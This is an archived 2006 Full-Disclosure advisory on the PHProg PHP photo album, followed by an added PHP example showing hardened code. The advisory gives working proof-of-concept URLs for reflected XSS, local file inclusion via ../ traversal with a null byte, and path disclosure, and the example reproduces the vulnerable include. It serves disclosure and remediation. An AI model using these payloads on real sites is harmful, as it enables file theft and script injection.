List: full-disclosure
Subject: [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path
From: "..." <cdg393 () gmail ! com>
Date: 2006-09-11 9:03:49
Message-ID: d2c8d5d80609110203q20a6e932gc7d23f6b431d5293 () mail ! gmail ! com
(11/09/06)

* Vulnerable product: PHProg (PHP photo album)
* Official product site: http://www.PHProg.com/
* Security flaws found:

1] Full path disclosure: http://localhost/PHProg/?id=1&album=cdg393

2] Cross Site Scripting (XSS): http://localhost/PHProg/?id=1&album=<script>alert('cdg393')</script>

3] Local File Inclusion:
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00

Line 59 => $lang=$_GET['lang'];
Line 61 => include("lang/$lang.php");

* Credits: cdg393 : cdg.new.fr =)
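The two-line include pattern quoted above (user-controlled $lang interpolated into include("lang/$lang.php")) is the whole LFI: "../" walks out of lang/, and on the PHP builds of 2006 a trailing %00 truncated the path so the ".php" suffix was never appended. The following is an added example, not PHProg's code: it reproduces that pattern, then shows a hardened replacement that allowlists the language identifier and verifies the resolved path stays inside the language directory, plus output escaping for the reflected album parameter. The lang/*.php layout comes from the advisory; the function names, the temp directory used for the demo, and the assumption that the album name is echoed into HTML are mine.

```php
<?php
// Added example, not PHProg's own code. Directory layout lang/<id>.php is taken
// from the advisory; everything else (function names, demo dir) is assumed.
declare(strict_types=1);

// --- Vulnerable pattern, as quoted in the advisory (index.php lines 59/61) ---
// With PHP < 5.3.4 a NUL byte (%00) truncates the path, so any readable file
// can be included. PHP >= 5.3.4 rejects NUL bytes in paths, but "../../x" still
// lets an attacker include any .php file the web server can read.
function load_language_vulnerable(array $get): void
{
    $lang = $get['lang'];          // attacker-controlled
    include("lang/$lang.php");     // ../../../../../../BOOT.INI%00 escapes lang/
}

// --- Hardened replacement ---
// 1) Accept only identifiers that can name a language file ("fr", "pt_BR").
// 2) Resolve the final path and confirm it is still inside the lang/ directory.
// 3) Fall back to a known default instead of including anything user-supplied.
function resolve_language_file(string $langDir, ?string $requested, string $default = 'en'): string
{
    $candidate = $requested ?? $default;

    // Strict allowlist: this alone rejects "/", "..", NUL bytes and extension tricks.
    if (!preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $candidate)) {
        $candidate = $default;
    }

    $base = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . $candidate . '.php');

    // realpath() is false for missing files; the prefix check also catches a
    // symlink inside lang/ that points elsewhere.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        $path = realpath($langDir . DIRECTORY_SEPARATOR . $default . '.php');
        if ($path === false) {
            throw new RuntimeException("default language file missing: $default");
        }
    }
    return $path;
}

function load_language_hardened(array $get, string $langDir): void
{
    include resolve_language_file($langDir, $get['lang'] ?? null);
}

// --- XSS: escape the reflected album name at output time ---
// Assumption: PHProg echoes $_GET['album'] into the page; the advisory shows only the URL.
function album_heading(string $album): string
{
    return '<h1>' . htmlspecialchars($album, ENT_QUOTES, 'UTF-8') . '</h1>';
}

// Demo with both payloads from the advisory, against a constructed lang/ directory.
$demoDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phprog_lang_demo';
if (!is_dir($demoDir)) {
    mkdir($demoDir, 0700);
}
file_put_contents($demoDir . DIRECTORY_SEPARATOR . 'en.php', "<?php \$T = ['title' => 'Album'];\n");

$lfiPayload = "../../../../../../BOOT.INI\0";
echo resolve_language_file($demoDir, $lfiPayload), "\n";   // resolves to .../en.php
echo resolve_language_file($demoDir, 'fr'), "\n";          // fr.php missing -> en.php

load_language_hardened(['lang' => $lfiPayload], $demoDir); // safe: includes en.php
echo album_heading("<script>alert('cdg393')</script>"), "\n";
```

The allowlist regex does the real work; the realpath() prefix check is defence in depth for files that exist under lang/ only as symlinks. For the full path disclosure item, the usual cause is a PHP warning (for example from a failed include or open on a bad album name) rendered with display_errors on; the fix is to log errors rather than display them on a production host, independent of the input validation above.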
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/